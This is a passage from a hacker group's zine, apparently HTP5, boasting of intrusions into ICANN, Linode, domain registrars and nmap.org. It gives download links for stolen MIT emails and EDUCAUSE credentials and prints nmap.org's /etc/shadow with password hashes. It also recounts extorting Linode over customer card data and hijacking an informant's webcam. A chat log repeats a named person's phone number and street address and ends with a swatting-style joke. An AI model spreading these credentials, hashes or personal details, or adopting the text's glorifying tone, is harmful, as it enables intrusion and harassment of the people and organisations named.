  382.  
  383. Moreover, we particularly enjoyed the fact that the first nameserver for
  384. root-servers.org is an EDU domain. This effectively gave us control over
  385. root-servers.org. However, ICANN is responsible for the root zones file.
  386.  
  387. ICANN was already compromised by that time, though, joined by several of the
  388. major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+
  389. backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly,
  390. they used passwordless private keys stored on their servers to ssh into the
  391. internal Juniper routers as superusers: only 3 networks away and not even phys
  392. sep. Nothing proxychains can't handle. They probably should've checked their
  393. netscreens before it was too late. :P
  394.  
  395. None of this access was ever used, but we did get to see some pretty funny
  396. shit. In the backbone of SourceForge (Savvis), for example, we ran into some
  397. old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key
  398. auth, and the kernels were fairly ancient (and in the absence of all file
  399. transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's
  400. served from port 43 - no file editing required). As it turns out, we were not
  401. the first ones there. On their Phoenix, AZ stats server, some random hacker was
  402. kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On
  403. SourceForge's backbone -- LOL? We don't think he fully realized what he had
  404. breached. Or maybe he just really needed a psyBNC server. Either way, he'll
  405. probably have to end up getting a new psyBNC after today. On Github or
  406. something.
  407.  
  408. Enjoy the MIT emails/EDUCAUSE login data, included in this segment of
  409. HTP5:
  410.  
  411. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  412. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip
  413. |- 2.6GB | Zip compressed MIT emails
  414. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
  415. |- 28MB | EDUCAUSE database: extracted domain credentials
  416. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip
  417. |- 12MB | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup
  418. ~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt
  419. |- 143K | EDUCAUSE domain passwords, allow account/DNS modification.
  420. | | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
  421. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  422.  
  423.  
  424. ▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░ ░ ░░
  425. ▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒ ░░░░░░░░░░░ ░░░░ ░░░░
  426. ▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░ ░░░░░░░░░░ ░
  427. ▓▓███▓▓▒███▄░▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░▄▄▄▄▀▀
  428. ▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒ ░░░░░░ ░ ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓
  429. ▒▒▓▓██████████▓▓▓▒▄▄ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀ ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████
  430. ▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████
  431. ▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████
  432. ▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███
  433. ▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒ ▓███▒░░▒███▓
  434. ▒▒░▒██▒▓██████ ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████ ▒████▓░░▓▓▓▓▒
  435. ░▒░░▓█░░▒▒▓██▓ ░░░░ ░███████████████████▒░ ▄ ▄▄ ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░
  436. ░░░░▒█░░░░▒▓▓░░ ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░
  437. ░ ░█▒ ░░▒▒░░ ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓ ▓██████▓░░ ▓
  438. ░░ █▒ ▒▒ ░░░░▓█████████▒▒▒░░░░░░░░ ░░░░░░░▒███▒▒▒███████▓ ░ ▓
  439. ░░░ ▓▒ ▒ ░▒ ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░ ░░ ░░░ ▒▓▓▓▓▓███▓▒▒ ░░ ▓
  440. ░ ▓▒ ▒▒ ▒▒░ ░░░░░░░░░░░░░░░░░ ░░ ░ ▒▓
  441. ░ ░░▓ ░░ ░▒░░ ░░ ░░░░░░ ░░░ ░░░░░ ░ ░▒ ▒
  442. ░░ ▓ ░░▒▒░░ ░░ ░░░░░ ░░░░ ░▒ ▓
  443. ░▓ ░▒▒░░ ░░░ ░░ ░░░ ░░ ░ ▒ ▒░
  444. ▓▒ ░░▒▒░░░ ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀ ░ ▒ ▒
  445. ▒▓░░░░░░▒▒▒░░░░ ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░ ░▒ ▓
  446. ▒▓ ░░ ░▒▒░░░░░ ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░ ░▒ █░
  447. ▓░ ░▒▓▒░░░░░ ░░░▒▒▓▓▒▒▒▒▒▒▒░░ ░ ░░░▒▒▒██▒░ ░░▒░▒▒
  448. ▒▓ ░▒▓▓▒▒░░░░ ░░▒▒▒▒▒░░░░ ░░░░░░░░░ ░░ ░▒▓█▒ ░▒▒░▓
  449. ▒▓ ░ ▒▒▒▒▒░░░ ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒ ░▒▒▒▒▒
  450. ▒▒ ░ ▒▒▒░░░░ ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░ ░░▒▒░▒
  451. ▒▓ ░ ▒▒▒▒▒▒░░ ░▒▒░░░░ ░░░░ ░ ░░░ ░▒▒ ░░▒▒░ ▒
  452. ▒▒ ░ ▒▒▒▓▒▒░░ ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒
  453. ▓▒░▒░░ ░▒▒▓▓▒▒░░ ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒
  454. ░▒▓▓▒▒▒▒▒ ░▒▒▓▓▓▒▒░░░░░▒▓▒░ ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░
  455. ░▒▒▒▓▓▒▒▒▓▒░ ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░
  456. ░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░ ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░
  457. ░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░ ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒ ░▒▒▒▒▒░░░░░░
  458. ░▒▒▒▒ ▒▒▓█▒▒▓▒░ ░ ░ ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░ ░▒▒▒▒▒▒░ ░░░
  459. ▒▒▒▒░ ▒▒▒▒▓▒▓▓▒░ ░ ░░▒▓▓█████████▓▓▓▓███████████████▓▒░ ░▒▒▒▒▒▒░
  460. ▒▒░ ▒▒▒▒▒█▓▓▒▒ ░░▒▒▒██████████████████████████▓▒▒ ▒▒▒▒▒▒▒░░
  461. ▒ ░░░▒▒▒▓██▒▒▒ ░ ░ ░▒▒▒▓█████████████████████▓▒▒░ ░ ▒▒▒▒▒▒░░░ ░
  462. ░ ░ ░░░░▒▒▒▒▓█▒▒░░░ ░░░▒▒██████████████████▓▓▒▒░ ░ ░▒▒▒▒░░░░░ ░░
  463. ░ ░ ░░░ ▒▒▒▒▒▒▓▓▒░░ ░ ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░ ░░▒▒▒░░░░░ ░░░░
  464. ░ ░░░░░░ ░▒▒▒▒▒▒▒▓▒ ░ ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░ ░░░▒▒▒▒░░░░ ░░░░░
  465. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  466. "I'm positive they owned."
  467. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
  468.  
  469. ▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄
  470. ██ ██ ███▄██ ██ ██ ██ ██ ██▄▄ HTP5
  471. ██ ██ ██ ▀██ ██▄██ ██▄█▀ ██▄▄
  472. ██ ▄▄ ▄▄
  473. ▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  474.  
  475. * Before reading this section of HTP5, we recommend you pop some popcorn.
  476.  
  477. Following HTP4, we were promptly attacked by the next set of skids looking to
  478. get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided
  479. to take an alternative route, and located us through the development of one of
  480. our botnets, Zodiac. We quickly switched into a fallback network and found out
  481. they used SwiftIRC. SwiftIRC's nameservers were none other than Linode.
  482.  
  483. Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell
  484. stored in their PHPBB MySQL database? if so -- you've finally been expunged ;)
  485. - HTP
  486.  
  487. Linode turned out to be safe from our null RDS pass 1day (before Adobe had
  488. released their critical advisory). In the meantime, their registrar (name.com)
  489. was taken out. We acquired their domain login (along with StackOverflow,
  490. DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins.
  491.  
  492. Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned.
  493. Back in November, we hinted at Huawei access in our Symantec release. Their
  494. registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P
  495.  
  496. However, right in time, our very own HTP zeroday research division manifested
  497. subzero.py: a zeroday giving us a direct route into Linode. We proceeded to
  498. breach Linode and acquire their in-memory keys. This allowed us to download
  499. Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+
  500. init=/bin/bash.
  501.  
  502. Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket,
  503. Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5,
  504. Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and
  505. xnite were customers, but that's getting into another story.
  506.  
  507. Unknown to us at the time, the FBI had successfully accessed HTP. They made
  508. their presence obvious, as everything we would get was burned within a few days.
  509. However, we merely considered it to be a leak, and waited to use Linode itself
  510. to identify the source.
  511.  
  512. Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly
  513. identifying themselves as the source of the leaks within HTP. We still
  514. considered it a leak, and told Linode that if they did not act upon our
  515. already-gained access by 5/1, we would shred all of our Linode-related data.
  516. This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH
  517. usernames, plaintext LiSH passwords, and employee logins. In the case of
  518. noncompliance, we stated that we would drop it all in our release.
  519.  
  520. This was actually quite a good offer. We made it because we didn't care about
  521. CCs to begin with (that's directed at everyone on Twitter blaming Linode for
  522. identity theft) and because our primary target was SwiftIRC, not Linode. They
  523. accepted to protect their customer data/CCs (there wasn't much choice).
  524.  
  525. The FBI got pissed off by this development and forced Linode's hand. After
  526. informing them we would follow through and shred all of our Linode data within a
  527. week, the FBI and Linode coordinated a release detailing the breach in an email
  528. to their customers. We were confused. If they just did this on 5/1, nothing
  529. would be affected? Apparently, the FBI did not trust us. We soon found out
  530. Linode's situation was not voluntary.
  531.  
  532. Linode was between a rock and a hard place. They had to comply with the FBI
  533. (immediately), but doing so would mean all 159,000+ customers would be on Full
  534. Disclosure by 5/1. Recognizing their situation, we instead told them that if
  535. they acknowledged HTP in their analysis, we'd go ahead and shred their customer
  536. data anyway. Readily enabling carders was never part of our plan. They agreed,
  537. and we proceeded to delete our copies of the data for them.
  538.  
  539. There was one more loose end to tie. We identified which users on HTP were
  540. involved with the FBI, and promptly gained access to one of their cams. Sure
  541. enough, there was a handler standing behind him, monitoring his involvement
  542. in HTP (hi!).
  543.  
  544. The FBI lost their access into HTP.
  545.  
  546. So what's in this release, if not Linode? EDIT: Hahaha we guess that was too
  547. hot, we'll give you guys registrar data instead.
  548.  
  549. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  550. ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png
  551. |- 193K | Linode blog post screenshot 1
  552. ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png
  553. |- 179K | Linode blog post screenshot 2
  554. ~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt
  555. |- 70K | Data on the registars mentioned above.
  556. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  557.  
  558.  
  559.  
  560.  
  561. ░░░░
  562. ░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░
  563. ░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░
  564. ░░▒▒▒▒░░ ░░░▒▒░░▒░░
  565. ░░░░░▒░░ ░░▒▒░░░▒░
  566. ░░░░░▒░░░ ░░▒░░░░░░
  567. ░░░▒░▒░▒░░ ░▒▒░░░░▒░░
  568. ░░░░▒▒▒░▓▒░▒░ ░░▒░░░░░░▒░
  569. ░░░░░░▓█▓█▓▒░░░ ░░▒░░░░░░░░▒░
  570. ░░░░░░▒▓████▓▒▒░░ ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░
  571. ░░░░░░░▒▒███▓▓░░░ ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░
  572. ░░░░░░▒▒░░░▓█▓▒░▒ ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░
  573. ░░░░░░▒▒░▒▒▒░▒▓▒░ ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░
  574. ░░░░░░░░░░▓▓▒▓▒░░░ ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░
  575. ░░░░░░░░▒░▒░░░▒▓▒░░ ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░
  576. ░░░░░░░░░░▒▒░░▓█▓▒░ ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░
  577. ░░░░░░░░░░░▒░▒▒▓░░░░ ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░
  578. ░░░░░░░░░░░▒░░▒▒▒░░░░░░ ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░
  579. ░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░
  580. ░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░
  581. ░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░
  582. ░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░
  583. ░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░
  584. ░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░
  585. ░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░
  586. ░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░
  587. ░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░
  588. ░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░
  589. ░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░
  590. ░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░
  591. ▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░
  592. ░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░
  593. ▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░
  594. ░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░
  595. ░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░
  596. ▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░
  597. ░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░
  598. ░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░
  599. ▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░
  600. ▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░
  601. ▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░
  602. ░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░
  603. ░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░
  604. ░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░
  605. ░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░
  606. ░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░
  607. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░
  608. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░
  609. ░░░░░░░░░░
  610. "You have to let it all go. Fear, doubt, and disbelief."
  611. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  612. ▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄
  613. ███▄ ██ ██▀▄▀██ ██ ██ ██ ██ HTP5
  614. ██ ▀█▄██ ██ ▀ ██ ██▀██ ██▀▀
  615. ██ ▀██ ██ ██ ██ ██ ██ Whoa. Did we just backdoor Trinity?
  616. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  617.  
  618. Access to nmap.org (Insecure) was gained through Linode, which also included
  619. svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy-
  620. shit mode beginning when we were backdooring it. We decided to withhold the
  621. private releases, including DARPA CINDER Nmap, and release to you the unabridged
  622. contents of the /home/ directory including those of Fyodor (Gordon Lyon) and
  623. David Fifield. Before we drop you into nmap.com, though, here's their
  624. /etc/shadow for those curious:
  625.  
  626. [root@web etc]# cat shadow
  627. root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7:::
  628. bin:*:14746:0:99999:7:::
  629. daemon:*:14746:0:99999:7:::
  630. adm:*:14746:0:99999:7:::
  631. lp:*:14746:0:99999:7:::
  632. sync:*:14746:0:99999:7:::
  633. shutdown:*:14746:0:99999:7:::
  634. halt:*:14746:0:99999:7:::
  635. mail:*:14746:0:99999:7:::
  636. news:*:14746:0:99999:7:::
  637. uucp:*:14746:0:99999:7:::
  638. operator:*:14746:0:99999:7:::
  639. games:*:14746:0:99999:7:::
  640. gopher:*:14746:0:99999:7:::
  641. ftp:*:14746:0:99999:7:::
  642. nobody:*:14746:0:99999:7:::
  643. vcsa:!!:14746:0:99999:7:::
  644. ntp:!!:14746::::::
  645. sshd:!!:14746::::::
  646. fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7:::
  647. david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7:::
  648. xfs:!!:14782::::::
  649. apache:!!:14782::::::
  650. web:!!:14782:0:99999:7:::
  651. postfix:!!:14782::::::
  652. webalizer:!!:14783::::::
  653. mysql:!!:14896::::::
  654. postgres:!!:14897::::::
  655. distcache:!!:14924::::::
  656. pcap:!!:15615::::::
  657. mailman:!!:15666::::::
  658.  
  659. Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES.
  660. By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it
  661. a spin.
  662.  
  663. AMIS - Adversary Mission Identification System
  664. ==============================================
  665. The Adversary Mission Identification System (AMIS) is a computer program
  666. that analyzes logs of network scans and reports possible signs of an
  667. adversary mission.
  668. The AMIS is designed to work with the logs produced by the Nmap Security
  669. Scanner. It is part of an overall defensive system that includes
  670. periodic scans and their analysis.
  671. The AMIS checks for these "tells" that may be signs of an insider
  672. mission:
  673. * Newly opened ports, particularly those of file servers (e.g. HTTP,
  674. FTP, and P2P services).
  675. * Differences in files shared by known file servers, including new
  676. files, deleted files, and changes in file metadata.
  677. * Security vulnerabilities in servers.
  678.  
  679. Enjoy this section of HTP5.
  680.  
  681. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  682. ~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz
  683. |- 16GB | Nmap.org: /home/
  684. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  685.  
  686.  
  687.  
  688. ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  689.  
  690. <~REDACTED_1> lol
  691. <~REDACTED_1> i got a dmca from cloudflare
  692. <INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has quit [Client exited]
  693. <~REDACTED_3> dmca?
  694. <~REDACTED_3> whats copyrighted
  695. <~REDACTED_1> Reporter's Name: Gordon Lyon
  696. <~REDACTED_1> Reporter's Email Address: gordon@insecure.com
  697. <~REDACTED_1> Reporter's Title: CTO
  698. <~REDACTED_1> Reporter's Company Name: Insecure.Com LLC
  699. <~REDACTED_1> Reporter's Telephone Number: 650-989-4206
  700. <~REDACTED_1> Reporter's Address: 370 Altair Way #113 Sunnyvale, CA US
  701. <~REDACTED_1> Reported URLs:
  702. <~REDACTED_1> http://straylig.ht/zines/htp5/0x03_nmap.txt
  703. <~REDACTED_1> Original Work: They released 16GB of our copyrighted data
  704. which they stole. I don't know if copyright applies to our password file,
  705. which they stole and released on this page, but it certainly applies to our
  706. Adversary Mission Identification System described on the page.
  707. <INFO> REDACTED_2 [REDACTED_2@HTP/user/REDACTED_2] has joined #thegibson
  708. <INFO> mode/#thegibson [+a REDACTED_2] by chippy1337
  709. <~REDACTED_3> well
  710. <~REDACTED_3> that would fit the bill
  711. <~REDACTED_3> lets call him up
  712. <~REDACTED_3> and take this
  713. <~REDACTED_3> to internet court
  714. <~REDACTED_3> im seriously considering
  715. <~REDACTED_3> printing this out
  716. <~REDACTED_3> and framing it on my wall
  717. <~REDACTED_3> cuz im lolin so hard
  718. <~REDACTED_3> 'sorry, there is a minimum requirement of 20GB before DCMAs are
  719. considered admissable in Internet Court'
  720. <&REDACTED_4> "What's that? You say there's a hostage situation in your
  721. apartment?! We'll call the police right away, sir."
  722.  
